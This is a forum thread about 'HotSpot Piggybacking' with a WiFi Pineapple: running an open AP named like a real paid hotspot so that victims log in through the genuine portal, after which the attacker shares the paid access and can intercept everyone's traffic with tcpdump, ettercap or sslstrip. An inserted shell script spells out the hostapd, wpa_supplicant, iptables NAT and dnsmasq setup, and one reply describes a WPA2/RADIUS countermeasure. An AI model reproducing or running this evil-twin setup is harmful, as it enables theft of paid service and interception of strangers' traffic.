thesugarat Posted April 30, 2014

There is a "normal" concept of using the Pineapple in the field which essentially looks like: wlan0 = "FreeWiFi", wlan1 = client mode connected to "BoingoHotspot". Under this configuration you, as the Pineapple owner, are responsible for getting through the wlan1 "BoingoHotspot" splash page/portal first, so that you are actually sharing their connection, but no one on FreeWiFi knows this.

But what I like to call HotSpot Piggybacking looks something like this: wlan0 = "BoingoHotspot2", wlan1 = client mode connected to "BoingoHotspot". With this configuration you are fishing for a legitimate BoingoHotspot user to authenticate themselves on what they believe is a legitimate Boingo AP. It looks and behaves exactly like the real thing because they are seeing the real splash page. But once they authenticate themselves, you and any other user on the Pineapple afterwards have internet. Also, you are still the MITM and can see all users' traffic, i.e. use tcpdump or ettercap or turn on sslstrip etc.

Does anybody else use this method? I realize it can take time, but I think it's a viable alternative if you don't have free wifi around or a cell stick/hotspot to use with your Pineapple. And it can work in coffee shops or airports equally well; it just requires a high turnover of users who log on to their local account with the hotspot provider.
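The two-radio layout described in the post above, as an added example that is not part of the original post or of the Pineapple's own scripts: wlan0 runs an open AP whose SSID mimics the upstream hotspot, wlan1 associates to the real hotspot as a client, and everything from wlan0 is masqueraded out of wlan1. The point the script makes concrete is why one legitimate login unlocks everyone: the upstream captive portal authorizes by the MAC address and DHCP lease of wlan1, which is the only client it ever sees. Interface names, SSIDs, the 172.16.42.0/24 subnet, the /tmp config paths and the tool choices (hostapd, wpa_supplicant, udhcpc, dnsmasq, iptables, curl) are assumptions; the script prints its plan unless invoked with `apply`.

```shell
#!/bin/sh
# Added example (not from the original post): NAT gateway between an
# impostor AP on wlan0 and a real captive-portal hotspot on wlan1.
# All names, addresses and tool choices below are assumptions.

UPSTREAM_SSID="BoingoHotspot"   # real hotspot, open auth (assumed)
FAKE_SSID="BoingoHotspot2"      # what wlan0 advertises (assumed)
AP_IF="wlan0"
UP_IF="wlan1"
AP_NET="172.16.42.0/24"
AP_ADDR="172.16.42.1"
CHANNEL="6"

# hostapd config for the open AP on wlan0. Open auth (wpa=0) like the real
# hotspot, so a victim sees no encryption mismatch, only the real splash page.
hostapd_conf() {
    cat <<EOF
interface=$AP_IF
driver=nl80211
ssid=$FAKE_SSID
hw_mode=g
channel=$CHANNEL
auth_algs=1
wpa=0
ignore_broadcast_ssid=0
EOF
}

# wpa_supplicant config to join the open upstream network on wlan1.
supplicant_conf() {
    cat <<EOF
network={
    ssid="$UPSTREAM_SSID"
    key_mgmt=NONE
}
EOF
}

# Gateway rules. MASQUERADE rewrites every wlan0 client's source address to
# wlan1's, so the portal sees a single client (wlan1's MAC and lease): once one
# victim completes the real login, that lease is authorized for all of them.
gateway_cmds() {
    cat <<EOF
sysctl -w net.ipv4.ip_forward=1
ip addr add $AP_ADDR/24 dev $AP_IF
iptables -P FORWARD DROP
iptables -t nat -A POSTROUTING -s $AP_NET -o $UP_IF -j MASQUERADE
iptables -A FORWARD -i $AP_IF -o $UP_IF -s $AP_NET -j ACCEPT
iptables -A FORWARD -i $UP_IF -o $AP_IF -m state --state ESTABLISHED,RELATED -j ACCEPT
EOF
}

# Check from the gateway whether wlan1's lease is currently authorized:
# an un-captured path returns 204; a portal answers with a redirect or 200.
# Needs network access, so it is not run by default.
upstream_unlocked() {
    code=$(curl -s -o /dev/null -m 5 --interface "$UP_IF" \
        -w '%{http_code}' http://connectivitycheck.gstatic.com/generate_204)
    [ "$code" = "204" ]
}

apply_piggyback() {
    hostapd_conf > /tmp/hostapd-ap.conf
    supplicant_conf > /tmp/wpa-upstream.conf
    wpa_supplicant -B -i "$UP_IF" -c /tmp/wpa-upstream.conf
    udhcpc -i "$UP_IF"                       # obtain the upstream lease on wlan1
    hostapd -B /tmp/hostapd-ap.conf
    gateway_cmds | sh -e
    dnsmasq --interface="$AP_IF" --bind-interfaces \
        --dhcp-range=172.16.42.10,172.16.42.200,12h   # leases for wlan0 clients
}

if [ "${1:-}" = "apply" ]; then
    apply_piggyback
else
    echo "# dry run: hostapd config, supplicant config, gateway commands"
    hostapd_conf
    supplicant_conf
    gateway_cmds
fi
```

Two caveats the script's layout makes visible. The "unlocked" state lasts only as long as the portal's session for wlan1's MAC and lease, so `upstream_unlocked` is worth polling to know when the next victim login is needed. And the trick works precisely because the portal trusts a MAC/IP pair it cannot bind to a person; a hotspot that moves authentication below the portal, as in madhak's WPA2/RADIUS design later in this thread, takes that shared lease away.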
Xcellerator Posted April 30, 2014

I've done this a couple of times when the only open APs I could see all required a paid login.
thesugarat (Author) Posted April 30, 2014

That's exactly the situation where this comes in handy...
madhak Posted April 30, 2014 (edited)

Yep. That's why I have implemented WPA2 with RADIUS auth for my hotspot AP... I was getting a lot of complaints about users not being able to log in while our system said they were logged in and being charged for... Now they log in to WPA2 as guest, purchase internet access over an encrypted channel, then the portal sends a WISPr message to the device which contains their personal WPA2 credentials... please hack that guy, you are the reason I have a job lol ;)

Edited April 30, 2014 by madhak